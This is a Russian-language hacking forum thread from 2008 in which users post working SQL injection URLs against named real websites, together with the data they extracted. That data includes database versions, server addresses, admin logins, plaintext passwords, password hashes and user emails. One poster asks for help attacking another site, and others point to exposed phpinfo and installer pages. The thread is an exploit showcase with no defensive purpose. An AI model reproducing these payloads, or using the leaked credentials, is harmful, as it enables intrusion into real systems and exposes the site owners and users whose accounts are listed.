ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4481  
Старый 12.01.2008, 20:24
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.bedesworld.co.uk/newsevents-news-story.php?newsId=59+union+select+1,concat(Version(),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
акуратно вышло =)
 
Ответить с цитированием

  #4482  
Старый 12.01.2008, 21:21
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://www.cowparademilano.it/

Код HTML:
http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.45-community-log:Sql167630@62.149.140.131:Sql167630_1

Код HTML:
http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,user_id,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+cp_user+LIMIT+0,1/*
2:cowparade:milano2007

http://www.stormensupport.no/

Код HTML:
http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),2,3,4,5,6,7,8,9,10/*
4.1.11-Debian_4sarge7-log:stormensql@tor:stormen

Код HTML:
http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),2,3,4,5,6,7,8,9,10+FROM+users/*
aafk:riise

Код HTML:
http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,user_password,user_email),0x71),0x71),2,3,4,5,6,7,8,9,10+FROM+phpbb_users+WHERE+user_id=2/*
NoggyStyles:2e5de30321d8e0151a76c10f5f8df122:nogge n@stormen.no::240982
Tante:61a1e25dd5c27f96825c84e452e268ce:ingerbeateb @hotmail.com::ibb (модер)
...
(http://www.stormensupport.no/forum/login.php)
 
Ответить с цитированием

  #4483  
Старый 12.01.2008, 21:35
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175

Репутация: 252
Отправить сообщение для BizzyD с помощью ICQ
По умолчанию

Код:
http://www.photostockplus.com/home.php?user_id=99999+union+select+concat_ws(0x3a,username,password,email),2,3,4,5,6,7,8,9,10,11,12+from+users+limit+2,1/*
photostock@74.53.6.244
hithop_photostock
4.1.20-log
root:78945d315964d1e0


Код:
http://www.cahiersdufootball.net/article.php?id=99999+union+select+1,2,3,concat_ws(0x3a,user

,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
ROOT:8B802B564368ADF78A06B7E873C3827E235A87CE
CAHIERSDUFOOTBALLNET3
ROOT@LOCALHOST
5.0.21-LOG
MICHEL : platini
 
Ответить с цитированием

  #4484  
Старый 12.01.2008, 21:49
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

curiocitytravel.com
Код HTML:
http://www.curiocitytravel.com/wNewsDetail.php?nId=-6+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5/*&lnId=1&cSe=1
USER:uv0642@localhost
VERSION:4.1.14-log
DATABASE:uv0642_curiocity
 
Ответить с цитированием

  #4485  
Старый 12.01.2008, 21:55
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR:3
Код:
http://www.togather.biz/showcg.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
archi@flik.pw:4.1.15-Debian_1-log:archi


PR:3
Код:
http://www.dety.info/tour.php?id=-182+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14/*
poisktur@v5.valuehost.ru:4.0.27-max-logoisktur
 
Ответить с цитированием

  #4486  
Старый 12.01.2008, 22:54
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

http://www.hairbeauty.ru/art.php?ID=70000000+UNION+SELECT+1,2,concat_ws(0x3 a,Login,Pass),4,5,6+from+AdUs/*
Kanochkina:a510afa5581822667f2e01793c44be2b:270619 60
sergey:c3c7b0e18a5373f727fa282d13143c11:11121934
misha:4b1130a31d98355e4590bbc3d1798bab
artur:825d7a62a2b80323a4ab48502e2a6e32
kio306:e0cb81f8d2408e37f7b679ac1fb95e02
логин:пас хз откуда

на сайт есть форум на 1к юзеров, но доступа к его базе нет
 
Ответить с цитированием

  #4487  
Старый 12.01.2008, 23:02
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://turotdih.ru/news_article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22-standard/maximwi_turotdih/maximwi_all@localhost

-----------------------------------------------------------------------------

http://www.garantpost.ru/about/news/?y=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.0.27-log/garant/garant@zvm8.host.ru
-----------------------------------------------------------------------------

elephant-odessa.com

http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5/*

4.1.22/elephantodessa/u_elephantod@localhost

Админка : http://elephant-odessa.com/admin

Логин/пароль к админке
http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,username,pass word),5+from+users/*

admin/[jkjlbkmybr2005
 
Ответить с цитированием

  #4488  
Старый 13.01.2008, 00:28
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.mediafetcher.com
Цитата:
http://www.mediafetcher.com/article_full.php?id=-34853+union+select+1,2,3,4,5,6,concat_ws(0x3a,fld_ username,fld_password,fld_email,fld_zip,fld_phone, fld_country,fld_state,
fld_city,fld_address,
fld_fname,fld_lname),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3+from+tbl_users+limit+0,1/*
5.0.26-Debian_2-log
31К юзеров
 
Ответить с цитированием

  #4489  
Старый 13.01.2008, 00:56
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Помогите раскрутить
Код:
http://greaterphoenixleadership.org/
Запрос писать в Username и Password =)
 
Ответить с цитированием

  #4490  
Старый 13.01.2008, 00:59
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.hairbeauty.ru/art.php?ID=70000000+UNION+SELECT+1,2,concat_ws(0x3 a,Login,Pass),4,5,6+from+AdUs/*
также там есть :
http://hairbeauty.ru/info.php - phpinfo
http://hairbeauty.ru/stat/setup/index.php - установка скрипта ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ